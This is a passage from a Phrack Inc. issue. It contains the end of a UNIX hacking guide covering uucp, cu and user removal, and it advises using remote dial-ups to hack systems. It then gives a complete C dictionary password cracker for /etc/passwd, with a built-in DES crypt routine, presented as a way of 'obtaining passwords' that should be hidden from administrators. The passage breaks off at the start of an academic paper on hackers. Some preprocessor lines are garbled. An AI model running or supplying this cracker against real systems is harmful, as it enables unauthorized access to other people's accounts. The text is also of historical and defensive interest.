  2185. This fuction completely removes the user,their mail file,home directory and all
  2186. files below their home directory from the machine.
  2187.  
  2188. Enter login ID you wish to remove[q]:      (eg.cathy)
  2189. 'cathy' belongs to 'Cathy Franklin'
  2190. whose home directory is /usr/cathy
  2191. Do you want to remove this login ID 'cathy' ? [y,n,?,q] :
  2192.  
  2193. /usr/cathy and all files under it have been deleted.
  2194.  
  2195. Enter login ID you wish to remove [q]:
  2196. \--------------------------------------------------------------------------/
  2197. This command deletes everthing owned by the user.Again this would be stupid to
  2198. use.
  2199.  
  2200.  
  2201. Other Super User Commands
  2202. ~~~~~~~~~~~~~~~~~~~~~~~~~
  2203. wall [text] control-d  - to send an anouncement to users logged in (will
  2204.                          override mesg -n command).  Execute only from /
  2205. /etc/newgrp - is used to become a member of a group
  2206.  
  2207. sysadm [program name]
  2208.         delgroup - delets groups
  2209.         diskuse - Shows free space etc.
  2210.         whoson - self explanatory
  2211.         lsgroup - Lists group
  2212.         mklineset -hunts various sequences
  2213.  
  2214.  
  2215.                         Basic Networking Unility (BNU)
  2216.                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2217.  
  2218. The BNU is a unique feature in UNIX.Some systems may not have this installed.
  2219. What BNU does is allow other remote UNIXes communicate with yours without
  2220. logging off the present one.BNU also allowes file transfer between computers.
  2221. Most UNIX systems V will have this feature installed.
  2222.  
  2223. The user program like cu,uux etc are located in the /usr/bin directory
  2224.  
  2225. Basic Networking Files
  2226. ~~~~~~~~~~~~~~~~~~~~~~
  2227. /usr/lib/uucp/[file name]
  2228.  [file name]
  2229.  systems - cu command to establishes link.Contains info on remote computers
  2230.            name, time it can be reached, login Id, password, telephone numbers
  2231.  devices - inter connected with systems files (Automatic call unit same in two
  2232.            entries) also contains baud rate, port tty1, etc.
  2233.  
  2234.  dialers - where asscii converation must be made before file tranfers etc.
  2235.  dialcodes - contains abreiviations for phone numbers that can be used in
  2236.              systems file
  2237.  
  2238. other files are sysfiles, permissions, poll, devconfig
  2239.  
  2240. Logining On To Remote And Sending+Receiving Files
  2241. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2242.  cu - This command allows one to log on to the local as well as the remote Unix
  2243.       (or a non unix)without haveing to hang up so you can transfer files.
  2244.       Usage:[options]
  2245.  
  2246.   $ cu [-s baud rate][-o odd parity][-e even parity][-l name of comm line]
  2247.        telephone number | systemname
  2248.  
  2249.   To view system names that you can communicate with use the 'unname' command:
  2250.   Eg. of output of names:
  2251.  
  2252.   ATT01
  2253.   ATT02
  2254.   ATT03
  2255.   ATT04
  2256.  
  2257.  
  2258. $ cu -s300 3=9872344 (9872344 is the tel)
  2259.  connected
  2260.  login:
  2261.  password:
  2262.  
  2263. Local Strings
  2264. ~~~~~~~~~~~~~
  2265. <~.> - will log you off the remote terminal, but not the local
  2266. <control-d> - puts you back on the remote unix local (the directory which you
  2267.               are in)
  2268. "%put [file name] - reverse of above
  2269.  
  2270. Ct
  2271. ~~
  2272. ct allows local to connect to remote.Initiates a getty on a remote terminal.
  2273. Usefull when using a remote terminal.BNU has call back feature that allows the
  2274. user on the remote who can execute a call back meaning the local can call the
  2275. remote.[   ] are options
  2276.  
  2277. $ ct [-h prevent automatic hang up][-s bps rate][-wt set a time to call back
  2278.      abbrieviated t mins] telephone number
  2279.  
  2280. Uux
  2281. ~~~
  2282. To execute commands on a remote (unix to unix)
  2283. usage:[  ] are options
  2284.  
  2285. $ uux [- use standard output][-n prevent mail notification][-p also use
  2286.       standard output] command-string
  2287.  
  2288. UUCP
  2289. ~~~~
  2290. UUCP copies files from ones computer to the home directory of a user in remote
  2291. system.  This also works when copying files from one directory to another in
  2292. the remote.  The remote user will be notified by mail.  This command becomes
  2293. use full when copying files from a remote to your local system.  The UUCP
  2294. requires the uucico daemon will call up the remote and will perform file login
  2295. sequence, file transfer, and notify the user by mail.  Daemons are programs
  2296. runining in the background.  The 3 daemons in a Unix are uucico, uusched,
  2297. uuxqt.
  2298.  
  2299. Daemons Explained:  [nows a good time to explain the 3 daemons]
  2300. ~~~~~~~~~~~~~~~~~
  2301. Uuxqt - Remote execution.  This daemon is executed by uudemon.hour started by
  2302.         cron.UUXQT searchs in the spool directory for executable file named
  2303.         X.file sent from the remote system.  When it finds a file X .file where
  2304.         it obtains process which are to be executed.  The next step is to find
  2305.         weather the processes are available at the time.The if available it
  2306.         checks permission and if everthing is o.k it proceeds the background
  2307.         proccess.
  2308.  
  2309. Uucico - This Daemon is very immportant for it is responsible in establishing
  2310.          a connection to the remote also checks permission, performs login
  2311.          procedures,transfers + executes files and also notifies the user by
  2312.          mail.  This daemon is called upon by uucp,uuto,uux commands.
  2313.  
  2314. Uusched - This is executed by the shell script called uudemon.hour.  This
  2315.           daemons acts as a randomizer before the UUCICO daemon is called.
  2316.  
  2317.  
  2318. Usage:
  2319.  
  2320. $ uucp [options] [first full path name!] file [destination path!] file example:
  2321.  
  2322. $ uucp -m -s bbss hackers unix2!/usr/todd/hackers
  2323.  
  2324. What this would do is send the file hackers from your computer to the remotes
  2325. /usr/todd/hackers making hackers of course as file.  Todd would mail that a
  2326. file has been sent to him.  The Unix2 is the name of the remote.  Options for
  2327. UUCP:  (Don't forget to type in remotes name Unix2 in case)
  2328. -c  dont copy files to spool directory
  2329. -C  copy to spool
  2330. -s[file name] - this file will contain the file status(above is bbss)
  2331. -r  Dont start the comm program(uucico) yet
  2332. -j  print job number(for above eg.unix2e9o3)
  2333. -m  send mail when file file is complete
  2334.  
  2335. Now suppose you wanted to receive file called kenya which is in the
  2336. usr/ dan/usa to your home directory /usr/john assuming that the local systems
  2337. name is ATT01 and you are currently working in /usr/dan/usa,you would type in:
  2338.  
  2339. $uucp kenya ATT01!/usr/john/kenya
  2340.  
  2341. Uuto
  2342. ~~~~
  2343. The uuto command allows one to send file to remote user and can also be used to
  2344. send files locally.
  2345.  
  2346. Usage:
  2347.  
  2348. $ uuto [file name] [system!login name]( omit systen name if local)
  2349.  
  2350.  
  2351. Conclusion
  2352. ~~~~~~~~~~
  2353. Theres always more one can say about the UNIX, but its time to stop.  I hope
  2354. you have enjoyed the article.  I apologize for the length.  I hope I made the
  2355. UNIX operating system more familiar.  The contents of the article are all
  2356. accurate to my knowledge.  Hacking into any system is illegal so try to use
  2357. remote dial-ups to the job.  Remember do not abuse any systems you hack into
  2358. for a true hacker doesn't like to wreck, but to learn.
  2359.  
  2360.    Watch for my new article on using PANAMAC airline computers coming soon.
  2361.  
  2362.                                   Red Knight
  2363.                                     P/HUN!
  2364.                                   <<T.S.A.N>>
  2365. =========================================================================
  2366.  
  2367.                                 ==Phrack Inc.==
  2368.  
  2369.                       Volume Two, Issue 22, File 6 of 12
  2370.  
  2371.             ()()()()()()()()()()()()()()()()()()()()()()()()()()()
  2372.             ()()                                              ()()
  2373.             ()         Yet Another File On Hacking Unix!        ()
  2374.             ()         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~        ()
  2375.             ()                        By                        ()
  2376.             ()                                                  ()
  2377.             ()                  >Unknown User<                  ()
  2378.             ()      A special "ghost" writer of Phrack Inc.     ()
  2379.             ()()                                              ()()
  2380.             ()()()()()()()()()()()()()()()()()()()()()()()()()()()
  2381.  
  2382.  
  2383. Greetings from The Unix Front...
  2384.  
  2385. I am unable to use my real alias since it has now become too well known and
  2386. others are able to associate it with my real name.  Let us just say that I have
  2387. been around for a long time, and can you say "Code Buster"?  Obsolete now,
  2388. nonetheless taught many how to write better ones.
  2389.  
  2390. The following C code will enable you to ferret out poorly constructed passwords
  2391. from /etc/passwd.  What I mean by poor passwords is obvious, these consist of
  2392. passwords based on the user's name, and even words found in the dictionary.
  2393. The most secure password is one that has been constructed from nonsense words,
  2394. odd combinations of one word, with control characters and numbers thrown in.
  2395. My program is not able to deal with a decent password, nor did I intend it to.
  2396. To write something capable of dealing with a secure password would have been
  2397. incredibly complex, and take weeks to run on even the fastest of cpu's.
  2398.  
  2399. Locate a dictionary file from your nearest Unix system.  This is commonly
  2400. located in /usr/dict/words.  These files will vary from 200K to 5 Megabytes.
  2401. The more words your dictionary file has in it, the more effective this program
  2402. will be.  The program can do a quick scan based on just the identifying name
  2403. fields in /etc/passwd or perform a complete scan using the dictionary file.  It
  2404. basically compares one /etc/passwd entry to each word in your dictionary file,
  2405. until it finds the password, or reaches eof,and begins the scan on the next
  2406. password.
  2407.  
  2408. It will take days to process a large /etc/passwd file.  When you re-direct the
  2409. output to a log file, make sure you run some sort of cron daemon that will
  2410. extract any decoded passwords, and then nulls the log file.  I can suggest
  2411. /bin/nohup for this task since you can log off and the task continues to run.
  2412. Otherwise, the log file can grow to be megabytes depending on the actual size
  2413. of the /etc/passwd file and your dictionary..This program,while written with
  2414. one purpose in mind (obtaining passwords),is also a positive contribution to
  2415. Unix System Administrators.
  2416.  
  2417. I run this on several systems nightly, to protect myself!  Scanning for user
  2418. passwords that are easy to hack, and for other insecure conditions ensures that
  2419. my own systems will not be breached.  Unix is still not a secure system, and
  2420. restoring gigabyte file systems is no fun.
  2421.  
  2422. I have made the software as portable as possible.  It is known to compile on
  2423. all BSD variants, and System V.  I don't suggest that you leave the source
  2424. laying around on just any system, most System Administrators are known to be
  2425. particularly nosy <smile>.  If you do, for God's sake crypt the damned file.
  2426.  
  2427. These are hard times we have fallen into.  The thrill of the telephone network
  2428. is no more.  Mere experimentation is riskier than ever.  There is little left,
  2429. but intellectual challenges in mastering system software and writing
  2430. interesting software for most of us.  As we all get older, the risks have grown
  2431. less attractive versus the few gains.  Someday when I am able to transfer five
  2432. or six million into my account in Zurich, I may chance it.  Until then, may I
  2433. take the time to wish you all good luck in your endeavors, and be careful!
  2434.  
  2435. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2436.  
  2437. /* Beginning of Program */
  2438.  
  2439. include <sys/stdio.h>
  2440. include <sys/ctype.h>
  2441. include <sys/signal.h>
  2442.  
  2443. define TRUE 1
  2444. define FALSE 0
  2445.  
  2446. int trace = FALSE;
  2447. char *dict = NULL;
  2448. char *word = NULL;
  2449. char *pwdfile = NULL;
  2450. char *startid = NULL;
  2451. FILE *pwdf;
  2452. FILE *dictf;
  2453. FILE *logf;
  2454. char nextword[64];
  2455. char preread = FALSE;
  2456. char pbuf[256];
  2457. char id[64];
  2458. char pw[64];
  2459. char goodpw[64];
  2460.  
  2461. main(argc,argv)
  2462. int argc;
  2463. char **argv;
  2464. {
  2465. char *passwd;
  2466. char *salt;
  2467. char *s;
  2468. char *crypt();
  2469. char xpw[64];
  2470. char pw2[64];
  2471. char dummy[64];
  2472. char comments[64];
  2473. char shell[64];
  2474. char dictword[64];
  2475. char gotit;
  2476. char important;
  2477. extern int optind;
  2478. extern char *optarg;
  2479. int option;
  2480. int cleanup();
  2481. int tried;
  2482. long time();
  2483.  
  2484. signal(SIGTERM,cleanup);
  2485. signal(SIGQUIT,cleanup);
  2486. signal(SIGHUP,cleanup);
  2487.  
  2488. while ((option = getopt(argc,argv, "d:i:p:tw:")) != EOF)
  2489.         switch(option) {
  2490.         case 'd':
  2491.                 dict = optarg;
  2492.                 break;
  2493.  
  2494.         case 'i':
  2495.                 startid = optarg;
  2496.                 break;
  2497.  
  2498.         case 'p':
  2499.                 pwdfile = optarg;
  2500.                 break;
  2501.  
  2502.         case 't':
  2503.                 ++trace;
  2504.                 break;
  2505.  
  2506.         case 'w':
  2507.                 word = optarg;
  2508.                 break;
  2509.  
  2510.         default:
  2511.                 help();
  2512.         }
  2513.  
  2514. if (optind < argc)
  2515.         help();
  2516.  
  2517. if (!pwdfile)
  2518.         pwdfile = "/etc/passwd";
  2519.  
  2520. openpw();
  2521. if (dict)
  2522.         opendict();
  2523.  
  2524. while(TRUE) {
  2525.         if (preread)
  2526.                 preread = FALSE;
  2527.         else
  2528.                 if (!fgets(pbuf,sizeof(pbuf),pwdf))
  2529.                         break;
  2530.         parse(id,pbuf,':');
  2531.         parse(xpw,pbuf,':');
  2532.         parse(pw,xpw,',');
  2533.         if (*pw && strlen(pw) != 13)
  2534.                 continue;
  2535.         parse(dummy,pbuf,':');
  2536.         important = (atoi(dummy) < 5);
  2537.         parse(dummy,pbuf,':');
  2538.         parse(comments,pbuf,':');
  2539.         gotit = !*pw;
  2540.         if (!gotit && *comments) {
  2541.                 strcpy(pw2,pw);
  2542.                 do {
  2543.                         sparse(pw2,comments);
  2544.                         if (!*pw2) continue;
  2545.                         if (allnum(pw2)) continue;
  2546.                         gotit = works(pw2);
  2547.                         if (!gotit)
  2548.                                 if (hasuc(pw2)) {
  2549.                                         lcase(pw2);
  2550.                                         gotit = works(pw2);
  2551.                                 }
  2552.                 } while (!gotit && *comments);
  2553.                 if (!gotit)
  2554.                         gotit = works(id);
  2555.         }
  2556.         if (!gotit && dict) {
  2557.                 resetdict();
  2558.                 tried = 0;
  2559.                 do {
  2560.                         if (works(nextword)) {
  2561.                                 gotit = TRUE;
  2562.                                 break;
  2563.                         }
  2564.                         if (++tried == 100) {
  2565.                                 printf("    <%8s> @
  2566. %ld\n",nextword,time(NULL));
  2567.                                 fflush(stdout);
  2568.                                 tried = 0;
  2569.                         }
  2570.                 } while(readdict());
  2571.         }
  2572.         if (gotit) {
  2573.                 if (*pw)
  2574.                         printf("** %8s \t- Password is %s\n",id,goodpw);
  2575.                 else {
  2576.                         parse(shell,pbuf,':');
  2577.                         parse(shell,pbuf,':');
  2578.                         shell[strlen(shell)-1] = 0;
  2579.                         printf("   %8s \t- Open Login (Shell=%s)\n",id,shell);
  2580.                 }
  2581.                 if (important)
  2582.                         printf("--------------------------------------------
  2583. Loo
  2584. k!\n");
  2585.         }
  2586.         else    printf("   %8s \t- Failed\n",id);
  2587. }
  2588.  
  2589. cleanup();
  2590. exit(0);
  2591.  
  2592. }
  2593.  
  2594.  
  2595. help()
  2596. {
  2597. fprintf(stderr,"Scan by The Unix Front\n");
  2598. fprintf(stderr,"usage: scan [-ddict] [-iid] [-ppfile] [-t] [-wword]\n");
  2599. exit(1);
  2600.  
  2601. }
  2602.  
  2603. cleanup()
  2604. {
  2605.  
  2606. if (logf)
  2607.         fclose(logf);
  2608.  
  2609. }
  2610.  
  2611.  
  2612. openpw()
  2613. {
  2614. char dummy[256];
  2615. char id[256];
  2616.  
  2617. if (!(pwdf = fopen(pwdfile,"r"))) {
  2618.         fprintf("Error opening specified password file: %s\n",pwdfile);
  2619.         exit(2);
  2620. }
  2621. if (startid) {
  2622.         while(TRUE) {
  2623.                 if (!(fgets(pbuf,sizeof(pbuf),pwdf))) {
  2624.                         fprintf(stderr,"Can't skip to id '%s'\n",startid);
  2625.                         exit(3);
  2626.                 }
  2627.                 strcpy(dummy,pbuf);
  2628.                 parse(id,dummy,':');
  2629.                 if (!strcmp(id,startid)) {
  2630.                         preread = TRUE;
  2631.                         return;
  2632.                 }
  2633.         }
  2634. }
  2635.  
  2636. }
  2637.  
  2638. /* Where's the dictionary file dummy! */
  2639.  
  2640. opendict()
  2641. {
  2642.  
  2643. if (!(dictf = fopen(dict,"r"))) {
  2644.         fprintf("Error opening specified dictionary: %s\n",dict);
  2645.         exit(4);
  2646. }
  2647.  
  2648. }
  2649.  
  2650. resetdict()
  2651. {
  2652. char *p;
  2653.  
  2654. rewind(dictf);
  2655.  
  2656. if (word) {
  2657.         while(TRUE) {
  2658.                 if (!(fgets(nextword,sizeof(nextword),dictf))) {
  2659.                         fprintf(stderr,"Can't start with specified word
  2660. '%s'\n",
  2661. word);
  2662.                         exit(3);
  2663.                 }
  2664.                 if (*nextword) {
  2665.                         p = nextword + strlen(nextword);
  2666.                         *--p = 0;
  2667.                 }
  2668.                 if (!strcmp(word,nextword))
  2669.                         return;
  2670.         }
  2671. }
  2672. else    if (!(fgets(nextword,sizeof(nextword),dictf)))
  2673.                 fprintf(stderr,"Empty word file: %s\n",dict);
  2674.         else    if (*nextword) {
  2675.                         p = nextword + strlen(nextword);
  2676.                         *--p = 0;
  2677.                 }
  2678.  
  2679. }
  2680.  
  2681.  
  2682. readdict()
  2683. {
  2684. int sts;
  2685. char *p;
  2686.  
  2687. sts = fgets(nextword,sizeof(nextword),dictf);
  2688. if (*nextword) {
  2689.         p = nextword + strlen(nextword);
  2690.         *--p = 0;
  2691. }
  2692. return sts;
  2693.  
  2694. }
  2695.  
  2696.  
  2697.  
  2698. works(pwd)
  2699. char *pwd;
  2700. {
  2701. char *s;
  2702.  
  2703. if (trace)
  2704.         printf(">> %8s \t- trying %s\n",id,pwd);
  2705. s = crypt(pwd,pw);
  2706. if (strcmp(s,pw))
  2707.         return FALSE;
  2708.  
  2709. strcpy(goodpw,pwd);
  2710.  
  2711. return TRUE;
  2712.  
  2713. }
  2714.  
  2715.  
  2716.  
  2717. parse(s1,s2,t1)
  2718. register char *s1;
  2719. register char *s2;
  2720. char t1;
  2721. {
  2722. char *t2;
  2723.  
  2724. t2 = s2;
  2725. while (*s2) {
  2726.         if (*s2 == t1) {
  2727.                 s2++;
  2728.                 break;
  2729.         }
  2730.         *s1++ = *s2++;
  2731. }
  2732. *s1 = 0;
  2733. while (*t2++ = *s2++);
  2734.  
  2735. }
  2736.  
  2737. sparse(s1,s2)
  2738. register char *s1;
  2739. register char *s2;
  2740. {
  2741. char *t2;
  2742.  
  2743. t2 = s2;
  2744. while (*s2) {
  2745.         if (index(" ()[]-/.",*s2)) {
  2746.                 s2++;
  2747.                 break;
  2748.         }
  2749.         *s1++ = *s2++;
  2750. }
  2751. *s1 = 0;
  2752. while (*t2++ = *s2++);
  2753.  
  2754. }
  2755.  
  2756. hasuc(s)
  2757. register char *s;
  2758. {
  2759.  
  2760. while (*s)
  2761.         if (isupper(*s++)) return TRUE;
  2762.  
  2763. return FALSE;
  2764.  
  2765. }
  2766.  
  2767. allnum(s)
  2768. register char *s;
  2769. {
  2770.  
  2771. while(*s)
  2772.         if (!isdigit(*s++)) return FALSE;
  2773.  
  2774. return TRUE;
  2775.  
  2776. }
  2777.  
  2778. lcase(s)
  2779. register char *s;
  2780. {
  2781.  
  2782. while(*s) {
  2783.         if (isupper(*s))
  2784.                 *s = tolower(*s);
  2785.         ++s;
  2786. }
  2787.  
  2788. }
  2789.  
  2790. ifdef HACKED
  2791.  
  2792. define void int
  2793.  
  2794. static char IP[] = {
  2795.         58,50,42,34,26,18,10, 2,
  2796.         60,52,44,36,28,20,12, 4,
  2797.         62,54,46,38,30,22,14, 6,
  2798.         64,56,48,40,32,24,16, 8,
  2799.         57,49,41,33,25,17, 9, 1,
  2800.         59,51,43,35,27,19,11, 3,
  2801.         61,53,45,37,29,21,13, 5,
  2802.         63,55,47,39,31,23,15, 7,
  2803. };
  2804.  
  2805. static char FP[] = {
  2806.         40, 8,48,16,56,24,64,32,
  2807.         39, 7,47,15,55,23,63,31,
  2808.         38, 6,46,14,54,22,62,30,
  2809.         37, 5,45,13,53,21,61,29,
  2810.         36, 4,44,12,52,20,60,28,
  2811.         35, 3,43,11,51,19,59,27,
  2812.         34, 2,42,10,50,18,58,26,
  2813.         33, 1,41, 9,49,17,57,25,
  2814. };
  2815.  
  2816. static char PC1_C[] = {
  2817.         57,49,41,33,25,17, 9,
  2818.          1,58,50,42,34,26,18,
  2819.         10, 2,59,51,43,35,27,
  2820.         19,11, 3,60,52,44,36,
  2821. };
  2822.  
  2823. static char PC1_D[] = {
  2824.         63,55,47,39,31,23,15,
  2825.          7,62,54,46,38,30,22,
  2826.         14, 6,61,53,45,37,29,
  2827.         21,13, 5,28,20,12, 4,
  2828. };
  2829.  
  2830. static char shifts[] = { 1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1, };
  2831.  
  2832. static char PC2_C[] = {
  2833.         14,17,11,24, 1, 5,
  2834.          3,28,15, 6,21,10,
  2835.         23,19,12, 4,26, 8,
  2836.         16, 7,27,20,13, 2,
  2837. };
  2838.  
  2839. static char PC2_D[] = {
  2840.         41,52,31,37,47,55,
  2841.         30,40,51,45,33,48,
  2842.         44,49,39,56,34,53,
  2843.         46,42,50,36,29,32,
  2844. };
  2845.  
  2846. static char C[28];
  2847. static char D[28];
  2848. static char KS[16][48];
  2849. static char E[48];
  2850. static char e2[] = {
  2851.         32, 1, 2, 3, 4, 5,
  2852.          4, 5, 6, 7, 8, 9,
  2853.          8, 9,10,11,12,13,
  2854.         12,13,14,15,16,17,
  2855.         16,17,18,19,20,21,
  2856.         20,21,22,23,24,25,
  2857.         24,25,26,27,28,29,
  2858.         28,29,30,31,32, 1,
  2859. };
  2860.  
  2861. void
  2862. setkey(key)
  2863. char    *key;
  2864. {
  2865.         register int i, j, k;
  2866.         int     t;
  2867.  
  2868.         for(i=0; i < 28; i++) {
  2869.                 C[i] = key[PC1_C[i]-1];
  2870.                 D[i] = key[PC1_D[i]-1];
  2871.         }
  2872.  
  2873.         for(i=0; i < 16; i++) {
  2874.  
  2875.  
  2876.                 for(k=0; k < shifts[i]; k++) {
  2877.                         t = C[0];
  2878.                         for(j=0; j < 28-1; j++)
  2879.                                 C[j] = C[j+1];
  2880.                         C[27] = t;
  2881.                         t = D[0];
  2882.                         for(j=0; j < 28-1; j++)
  2883.                                 D[j] = D[j+1];
  2884.                         D[27] = t;
  2885.                 }
  2886.  
  2887.  
  2888.                 for(j=0; j < 24; j++) {
  2889.                         KS[i][j] = C[PC2_C[j]-1];
  2890.                         KS[i][j+24] = D[PC2_D[j]-28-1];
  2891.                 }
  2892.         }
  2893.  
  2894.         for(i=0; i < 48; i++)
  2895.                 E[i] = e2[i];
  2896. }
  2897.  
  2898. static char S[8][64] = {
  2899.         14, 4,13, 1, 2,15,11, 8, 3,10, 6,12, 5, 9, 0, 7,
  2900.          0,15, 7, 4,14, 2,13, 1,10, 6,12,11, 9, 5, 3, 8,
  2901.          4, 1,14, 8,13, 6, 2,11,15,12, 9, 7, 3,10, 5, 0,
  2902.         15,12, 8, 2, 4, 9, 1, 7, 5,11, 3,14,10, 0, 6,13,
  2903.  
  2904.         15, 1, 8,14, 6,11, 3, 4, 9, 7, 2,13,12, 0, 5,10,
  2905.          3,13, 4, 7,15, 2, 8,14,12, 0, 1,10, 6, 9,11, 5,
  2906.          0,14, 7,11,10, 4,13, 1, 5, 8,12, 6, 9, 3, 2,15,
  2907.         13, 8,10, 1, 3,15, 4, 2,11, 6, 7,12, 0, 5,14, 9,
  2908.  
  2909.         10, 0, 9,14, 6, 3,15, 5, 1,13,12, 7,11, 4, 2, 8,
  2910.         13, 7, 0, 9, 3, 4, 6,10, 2, 8, 5,14,12,11,15, 1,
  2911.         13, 6, 4, 9, 8,15, 3, 0,11, 1, 2,12, 5,10,14, 7,
  2912.          1,10,13, 0, 6, 9, 8, 7, 4,15,14, 3,11, 5, 2,12,
  2913.  
  2914.          7,13,14, 3, 0, 6, 9,10, 1, 2, 8, 5,11,12, 4,15,
  2915.         13, 8,11, 5, 6,15, 0, 3, 4, 7, 2,12, 1,10,14, 9,
  2916.         10, 6, 9, 0,12,11, 7,13,15, 1, 3,14, 5, 2, 8, 4,
  2917.          3,15, 0, 6,10, 1,13, 8, 9, 4, 5,11,12, 7, 2,14,
  2918.  
  2919.          2,12, 4, 1, 7,10,11, 6, 8, 5, 3,15,13, 0,14, 9,
  2920.         14,11, 2,12, 4, 7,13, 1, 5, 0,15,10, 3, 9, 8, 6,
  2921.          4, 2, 1,11,10,13, 7, 8,15, 9,12, 5, 6, 3, 0,14,
  2922.         11, 8,12, 7, 1,14, 2,13, 6,15, 0, 9,10, 4, 5, 3,
  2923.  
  2924.         12, 1,10,15, 9, 2, 6, 8, 0,13, 3, 4,14, 7, 5,11,
  2925.         10,15, 4, 2, 7,12, 9, 5, 6, 1,13,14, 0,11, 3, 8,
  2926.          9,14,15, 5, 2, 8,12, 3, 7, 0, 4,10, 1,13,11, 6,
  2927.          4, 3, 2,12, 9, 5,15,10,11,14, 1, 7, 6, 0, 8,13,
  2928.  
  2929.          4,11, 2,14,15, 0, 8,13, 3,12, 9, 7, 5,10, 6, 1,
  2930.         13, 0,11, 7, 4, 9, 1,10,14, 3, 5,12, 2,15, 8, 6,
  2931.          1, 4,11,13,12, 3, 7,14,10,15, 6, 8, 0, 5, 9, 2,
  2932.          6,11,13, 8, 1, 4,10, 7, 9, 5, 0,15,14, 2, 3,12,
  2933.  
  2934.         13, 2, 8, 4, 6,15,11, 1,10, 9, 3,14, 5, 0,12, 7,
  2935.          1,15,13, 8,10, 3, 7, 4,12, 5, 6,11, 0,14, 9, 2,
  2936.          7,11, 4, 1, 9,12,14, 2, 0, 6,10,13,15, 3, 5, 8,
  2937.          2, 1,14, 7, 4,10, 8,13,15,12, 9, 0, 3, 5, 6,11,
  2938. };
  2939.  
  2940. static char P[] = {
  2941.         16, 7,20,21,
  2942.         29,12,28,17,
  2943.          1,15,23,26,
  2944.          5,18,31,10,
  2945.          2, 8,24,14,
  2946.         32,27, 3, 9,
  2947.         19,13,30, 6,
  2948.         22,11, 4,25,
  2949. };
  2950.  
  2951.  
  2952. static char L[32], R[32];
  2953. static char tempL[32];
  2954. static char f[32];
  2955. static char preS[48];
  2956.  
  2957. void
  2958. encrypt(block, edflag)
  2959. char    *block;
  2960. int     edflag;
  2961. {
  2962.         int     i, ii;
  2963.         register int t, j, k;
  2964.  
  2965.         for(j=0; j < 64; j++)
  2966.                 L[j] = block[IP[j]-1];
  2967.  
  2968.         for(ii=0; ii < 16; ii++) {
  2969.  
  2970.                 if(edflag)
  2971.                         i = 15-ii;
  2972.                 else
  2973.                         i = ii;
  2974.  
  2975.                 for(j=0; j < 32; j++)
  2976.                         tempL[j] = R[j];
  2977.  
  2978.                 for(j=0; j < 48; j++)
  2979.                         preS[j] = R[E[j]-1] ^ KS[i][j];
  2980.  
  2981.                 for(j=0; j < 8; j++) {
  2982.                         t = 6*j;
  2983.                         k = S[j][(preS[t+0]<<5)+
  2984.                                 (preS[t+1]<<3)+
  2985.                                 (preS[t+2]<<2)+
  2986.                                 (preS[t+3]<<1)+
  2987.                                 (preS[t+4]<<0)+
  2988.                                 (preS[t+5]<<4)];
  2989.                         t = 4*j;
  2990.                         f[t+0] = (k>>3)&01;
  2991.                         f[t+1] = (k>>2)&01;
  2992.                         f[t+2] = (k>>1)&01;
  2993.                         f[t+3] = (k>>0)&01;
  2994.                 }
  2995.  
  2996.                 for(j=0; j < 32; j++)
  2997.                         R[j] = L[j] ^ f[P[j]-1];
  2998.  
  2999.                 for(j=0; j < 32; j++)
  3000.                         L[j] = tempL[j];
  3001.         }
  3002.  
  3003.         for(j=0; j < 32; j++) {
  3004.                 t = L[j];
  3005.                 L[j] = R[j];
  3006.                 R[j] = t;
  3007.         }
  3008.  
  3009.         for(j=0; j < 64; j++)
  3010.                 block[j] = L[FP[j]-1];
  3011. }
  3012.  
  3013. char *
  3014. crypt(pw, salt)
  3015. char    *pw, *salt;
  3016. {
  3017.         register int i, j, c;
  3018.         int     temp;
  3019.         static char block[66], iobuf[16];
  3020.  
  3021.         for(i=0; i < 66; i++)
  3022.                 block[i] = 0;
  3023.         for(i=0; (c= *pw) && i < 64; pw++) {
  3024.                 for(j=0; j < 7; j++, i++)
  3025.                         block[i] = (c>>(6-j)) & 01;
  3026.                 i++;
  3027.         }
  3028.  
  3029.         setkey(block);
  3030.  
  3031.         for(i=0; i < 66; i++)
  3032.                 block[i] = 0;
  3033.  
  3034.         for(i=0; i < 2; i++) {
  3035.                 c = *salt++;
  3036.                 iobuf[i] = c;
  3037.                 if(c > 'Z')
  3038.                         c -= 6;
  3039.                 if(c > '9')
  3040.                         c -= 7;
  3041.                 c -= '.';
  3042.                 for(j=0; j < 6; j++) {
  3043.                         if((c>>j) & 01) {
  3044.                                 temp = E[6*i+j];
  3045.                                 E[6*i+j] = E[6*i+j+24];
  3046.                                 E[6*i+j+24] = temp;
  3047.                         }
  3048.                 }
  3049.         }
  3050.  
  3051.         for(i=0; i < 25; i++)
  3052.                 encrypt(block, 0);
  3053.  
  3054.         for(i=0; i < 11; i++) {
  3055.                 c = 0;
  3056.                 for(j=0; j < 6; j++) {
  3057.                         c <<= 1;
  3058.                         c |= block[6*i+j];
  3059.                 }
  3060.                 c += '.';
  3061.                 if(c > '9')
  3062.                         c += 7;
  3063.                 if(c > 'Z')
  3064.                         c += 6;
  3065.                 iobuf[i+2] = c;
  3066.         }
  3067.         iobuf[i+2] = 0;
  3068.         if(iobuf[1] == 0)
  3069.                 iobuf[1] = iobuf[0];
  3070.         return(iobuf);
  3071. }
  3072.  
  3073. endif
  3074.  
  3075. /* end of program */
  3076. _______________________________________________________________________________
  3077. =========================================================================
  3078.  
  3079.                                 ==Phrack Inc.==
  3080.  
  3081.                       Volume Two, Issue 22, File 7 of 12
  3082.  
  3083.            [][][][][][][][][][][][][][][][][][][][][][][][][][][][]
  3084.            []                                                    []
  3085.            [] Computer Hackers Follow A Guttman-Like Progression []
  3086.            []                                                    []
  3087.            []               by Richard C. Hollinger              []
  3088.            []                University Of Florida               []
  3089.            []                                                    []
  3090.            []                     April, 1988                    []
  3091.            []                                                    []
  3092.            [][][][][][][][][][][][][][][][][][][][][][][][][][][][]
  3093.  
  3094. Little is known about computer "hackers," those who invade the privacy of
  3095. somone else's computer.  This pretest gives us reason to believe that their
  3096. illegal activities follow a Guttman-like involvement in deviance.
  3097.  
  3098. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3099.  
  3100. Computer crime has gained increasing attention, from news media to the
  3101. legislature.  The nation's first computer crime statute passed unanimously in
  3102. the Florida Legislature during 1978 in response to a widely publicized incident
  3103. at the Flagler Dog Track near Miami where employees used a computer to print
  3104. bogus winning trifecta tickets (Miami Herald, 1977a and 1977b; Underwood,
  3105. 1979).  Forty-seven states and the federal government have enacted some
